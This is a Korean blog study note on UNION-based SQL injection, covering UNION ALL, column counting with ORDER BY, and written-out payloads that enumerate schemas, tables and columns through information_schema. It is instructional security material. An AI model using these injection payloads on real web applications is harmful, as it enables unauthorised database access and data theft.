์ƒˆ์†Œ์‹

์ธ๊ธฐ ๊ฒ€์ƒ‰์–ด

๐Ÿ“  Secure

UNION SQL INJECTION

  • -
๋ฐ˜์‘ํ˜•
UNION SQL INJECTION ๊ณต๊ฒฉ

์‚ฌ์šฉ์ž ์ž…๋ ฅ๊ฐ’ // SQL ์ฟผ๋ฆฌ๋ฅผ ๊ณต๊ฒฉ

 

UNION // UNION ALL

 

ex)

CREATE DATABASE test;

USE test

CREATE TABLE user1 (idx int, id varchar(10));
INSERT INTO user1 VALUES (1,'admin');
INSERT INTO user1 VALUES (2,'Kim');
INSERT INTO user1 VALUES (3,'Park');



CREATE TABLE user2 (idx int,id varchar(10));
INSERT INTO user2 VALUES (1,'admin');
INSERT INTO user2 VALUES (2,'Lee');
INSERT INTO user2 VALUES (3,'Choi');

SQL ์ธ์ ์…˜ ๊ณต๊ฒฉ์„ ํ•  ๋•Œ ์ค‘๋ณต์ œ๊ฑฐ๋ฅผ ํ•˜๋ฉด ์˜ค๋ฅ˜๊ฐ€ ๋ฐœ์ƒํ•˜๋Š” ๊ฒฝ์šฐ ์žˆ์„ ์ˆ˜ ์žˆ์œผ๋ฏ€๋กœ UNION(X) UNION ALL(์‚ฌ์šฉ)

UNION : ์ž๋™์œผ๋กœ ์ค‘๋ณต์„ ์ œ๊ฑฐ์‹œํ‚ค๋Š” ์—ญํ• 

UNION ALL : ์ค‘๋ณต ์ œ๊ฑฐ ์—†์ด ์ „๋ถ€ ํ•ฉ์ณ์„œ ์ถœ๋ ฅ

์ƒ์œ„ ์ปฌ๋Ÿผ ๊ฐฏ์ˆ˜์™€ ํ•˜์œ„ ์ปฌ๋Ÿผ ๊ฐฏ์ˆ˜๊ฐ€ ์ผ์น˜ํ•˜์ง€ ์•Š์•„ ์ƒ๊ธฐ๋Š” ERROR
์ค‘๋ณต ์ œ๊ฑฐ๊ฐ€ ๋˜์ง€ ์•Š๊ฒŒ UNION ALL ๊ผญ ์‚ฌ์šฉํ•˜๊ธฐ

1. ๋Œ€์šฉ๋Ÿ‰ ํƒ€์ž…์˜ ๋ฐ์ดํ„ฐ ํƒ€์ž…์€ ์ค‘๋ณต์ œ๊ฑฐ์™€ ์ปฌ๋Ÿผ ์ •๋ ฌ์ด ๋ถˆ๊ฐ€๋Šฅ ํ•˜๋‹ค

2. ๋Œ€์šฉ๋Ÿ‰ ํƒ€์ž…์˜ ๋ฐ์ดํ„ฐ ํƒ€์ž…์€ ์ •๋ ฌ์ด ๋ถˆ๊ฐ€๋Šฅํ•˜๋‹ค > ๋‹จ, MySQL์€ ์ƒ๊ด€ํ•˜์ง€ ์•Š๋Š”๋‹ค.

 

UNION ๊ณต๊ฒฉ์„ ํ•˜๊ธฐ ์œ„ํ•ด ํ•„์š”ํ•œ ์ฒซ๋ฒˆ์งธ ์ •๋ณด : ์ปฌ๋Ÿผ์˜ ๊ฐœ์ˆ˜

UNION ๊ณต๊ฒฉ์„ ํ•˜๊ธฐ ์œ„ํ•œ ๋‘๋ฒˆ์งธ ์ •๋ณด : ๋Œ€์šฉ๋Ÿ‰ ๋ฐ์ดํ„ฐ ํƒ€์ž…์˜ ์œ ๋ฌด

 

ORDER BY 1 : ์ฒซ๋ฒˆ์งธ ์ปฌ๋Ÿผ์—์„œ ์˜ค๋ฆ„์ฐจ์ˆœ์œผ๋กœ ์ •๋ ฌํ•˜์‹œ์˜ค

ORDER BY 2 : ๋‘๋ฒˆ์งธ ์ปฌ๋Ÿผ์—์„œ ์˜ค๋ฆ„์ฐจ์ˆœ์œผ๋กœ ์ •๋ ฌํ•˜์‹œ์˜ค

ORDER BY 1000 : ์ฒœ๋ฒˆ์งธ ์ปฌ๋Ÿผ์—์„œ ์˜ค๋ฆ„์ฐจ์ˆœ์œผ๋กœ ์ •๋ ฌํ•˜์‹œ์˜ค

 

ORDER BY 1 : (O) ์ฒซ๋ฒˆ์งธ ์ปฌ๋Ÿผ์ด ์กด์žฌํ•œ๋‹ค

ORDER BY 2 : (O) ๋‘๋ฒˆ์งธ ์ปฌ๋Ÿผ์ด ์กด์žฌํ•œ๋‹ค

...

ORDER BY 5 : (ERROR) ๋‹ค์„ฏ๋ฒˆ์งธ ์ปฌ๋Ÿผ์ด ์กด์žฌํ•˜์ง€์•Š๋Š”๋‹ค ?

> ๋Œ€์šฉ๋Ÿ‰ ํƒ€์ž…์˜ ๋ฐ์ดํ„ฐ ํƒ€์ž…์ด๋ผ ์ •๋ ฌ์ด ๋ถˆ๊ฐ€๋Šฅ์ผ ์ˆ˜๋„ ์žˆ๋‹ค.

๊ทธ๋Ÿฌ๋ฏ€๋กœ ORDER BY 6 : (O) ์ด ๋  ์ˆ˜๋„ ์žˆ์œผ๋‹ˆ๊นŒ ์ตœ์†Œ 3๊ฐœ๋Š” ๋” ํ™•์ธํ•ด๋ด์•ผํ•จ

 

idx ์ˆœ์œผ๋กœ ์ •๋ ฌ ๋˜๋Š”๊ฒƒ์„ ํ™•์ธ
title ์ˆœ์œผ๋กœ ์ •๋ ฌ๋˜๋Š”๊ฒƒ์„ ํ™•์ธ

 

SELECT * FROM table WHERE TITLE='[์‚ฌ์šฉ์ž ์ž…๋ ฅ ๊ฐ’]'

' UNION SELECT null,null,null,null,null,null,null #

' and 1=2 UNION SELECT null,null,null,null,null,null,null #

๊ฐ ์ˆซ์ž๋“ค์˜ ๋ฐ์ดํ„ฐ ์œ„์น˜๋ฅผ ํ™•์ธํ•˜๊ธฐ

' and 1=2 UNION SELECT '1','2','null','4','null','null','7' #

๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค ์ด๋ฆ„, ์œ ์ € ์ด๋ฆ„, ๋ฒ„์ „ ํ™•์ธ ๊ฐ€๋Šฅ
๋ฉ”ํƒ€๋ฐ์ดํ„ฐ ๋ชฉ๋กํ™”ํ•˜๊ธฐ

' and 1=2 UNION SELECT schema_name,'2',null,'4',null,null,'7' from information_schema.schemata #

' and 1=2 UNION SELECT table_name,'2',null,'4',null,null,'7' from information_schema.tables #

' and 1=2 UNION SELECT column_name,'2',null,'4',null,null,'7' from information_schema.columns WHERE table_name='character_sets' #
๋ฐ˜์‘ํ˜•

'๐Ÿ“  Secure' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

Blind Injection -1  (0) 2022.07.01
oracle ํ™˜๊ฒฝ ์„ค์ •  (0) 2022.06.30
SQL Injection  (0) 2022.06.29
2022-06-27  (0) 2022.06.28
2022-06-23  (0) 2022.06.28
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.